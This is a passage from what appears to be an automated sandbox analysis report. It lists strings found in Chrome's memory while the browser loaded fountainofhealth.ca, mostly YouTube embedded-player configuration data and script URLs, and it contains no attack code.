ZWwuc2x0KCl9LHQpfTt3Ll9feXRSSUw9ZnVuY3Rpb24oZWwpe2lmKCFlbC5nZXRBdHRyaWJ1dGUoImRhdGEtdGh1bWIiKSlpZih3LnJlcXVlc3RBbmltYXRpb25GcmFtZSl3LnJlcXVlc3RBbmltYXRpb25GcmFtZShmdW5jdGlvbigpe3NsdChlbCwwKX0pO2Vsc2Ugc2x0KGVsLDE2KX19KSh3aW5kb3csZG9jdW1lbnQpOwo=","url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: I_keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2332503048.000028EC04B10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Jhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.jsaDb equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2369897325.000028EC07F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/FURi5aHgp1g?si\\u003dY2rCuE23jf8bkHaX\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGENPhrwUQgc3OHBDxnLAFEJmYsQUQ9v7_EhD-ns8cELCJzxwQuOTOHBDqo88cENeczxwQ5qDPHBCChLgiEJr0zhwQ37jOHBC-irAFEImEuCIQk4bPHBDcos8cEIiHsAUQvbauBRDk5_8SEODg_xIQpp3PHBDJ968FEPDizhwQr4__EhDhns8cELnZzhwQzInPHBCcm88cEPyyzhwQ_ZzPHBC36v4SEParsAUQvZmwBRDah4ATEN68zhwQi4KAExDdls8cELvZzhwQntCwBRCJsM4cEOugzxwQh6zOHBCI468FEMnmsAUQlP6wBRCZjbEFEOvo_hIQ7qDPHBD-8_8SEMzfrgUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNalUyTlRNM05qSTNNQT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiLvvOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI+a7znK23jQMVJnlMCB2AoyiC\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,
Source: chrome.exe, 00000000.00000003.2364902944.000028EC07FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/gobWGqPjLSQ?si\\u003dE-htCYBt9m3YW0ws\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGELnZzhwQ7aDPHBC9mbAFEN68zhwQ66DPHBDmoM8cEIiHsAUQpp3PHBCJsM4cEOvo_hIQr4__EhDk5_8SENyizxwQ9quwBRDdls8cEJmYsQUQ37jOHBDxnLAFEP2czxwQvoqwBRCHrM4cEIjjrwUQ4Z7PHBD-ns8cEODg_xIQiIS4IhCThs8cEIHNzhwQ2oeAExCa9M4cEJybzxwQmY2xBRCe0LAFEPyyzhwQvbauBRCLgoATEMzfrgUQ0-GvBRD-8_8SELvZzhwQyeawBRDqo88cEMyJzxwQt-r-EhCwic8cEIOEuCIQ9v7_EhCU_rAFENeczxwQuOTOHBDw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNakEwTnpNd05UVTVOZz09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiC1vOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMIx8HznK23jQMV42xMCB1cST25\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},vm:function(){e=tb()},ie:function(){d()}}};var cc=wa(["data-gtm-yt-inspected-"]),GI=["www.youtube.com","www.youtube-nocookie.com"],HI,II=!1; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: Mhttps://www.youtube.com/^0https://fountainofhealth.ca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: Mhttps://www.youtube.com/^0https://fountainofhealth.ca/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501943849.000028EC06D2C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: Oript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2505015083.000028EC07974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}AYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: RJhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330677012.000028EC001CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: SKhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323428029.000028EC04BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: S\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/FURi5aHgp1g?si\\u003dY2rCuE23jf8bkHaX\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGENPhrwUQgc3OHBDxnLAFEJmYsQUQ9v7_EhD-ns8cELCJzxwQuOTOHBDqo88cENeczxwQ5qDPHBCChLgiEJr0zhwQ37jOHBC-irAFEImEuCIQk4bPHBDcos8cEIiHsAUQvbauBRDk5_8SEODg_xIQpp3PHBDJ968FEPDizhwQr4__EhDhns8cELnZzhwQzInPHBCcm88cEPyyzhwQ_ZzPHBC36v4SEParsAUQvZmwBRDah4ATEN68zhwQi4KAExDdls8cELvZzhwQntCwBRCJsM4cEOugzxwQh6zOHBCI468FEMnmsAUQlP6wBRCZjbEFEOvo_hIQ7qDPHBD-8_8SEMzfrgUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNalUyTlRNM05qSTNNQT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiLvvOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI+a7znK23jQMVJnlMCB2AoyiC\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER
Source: chrome.exe, 00000000.00000002.2496982560.000028EC04B21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: S\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Science of THRIVE Approach3+https://www.youtube.com/watch?v=gobWGqPjLSQ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Times New RomanE=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Times New RomanE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340748270.000028EC06CF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323529169.000028EC04BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/FURi5aHgp1g?si\\u003dY2rCuE23jf8bkHaX\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGENPhrwUQgc3OHBDxnLAFEJmYsQUQ9v7_EhD-ns8cELCJzxwQuOTOHBDqo88cENeczxwQ5qDPHBCChLgiEJr0zhwQ37jOHBC-irAFEImEuCIQk4bPHBDcos8cEIiHsAUQvbauBRDk5_8SEODg_xIQpp3PHBDJ968FEPDizhwQr4__EhDhns8cELnZzhwQzInPHBCcm88cEPyyzhwQ_ZzPHBC36v4SEParsAUQvZmwBRDah4ATEN68zhwQi4KAExDdls8cELvZzhwQntCwBRCJsM4cEOugzxwQh6zOHBCI468FEMnmsAUQlP6wBRCZjbEFEOvo_hIQ7qDPHBD-8_8SEMzfrgUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNalUyTlRNM05qSTNNQT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiLvvOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI+a7znK23jQMVJnlMCB2AoyiC\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\
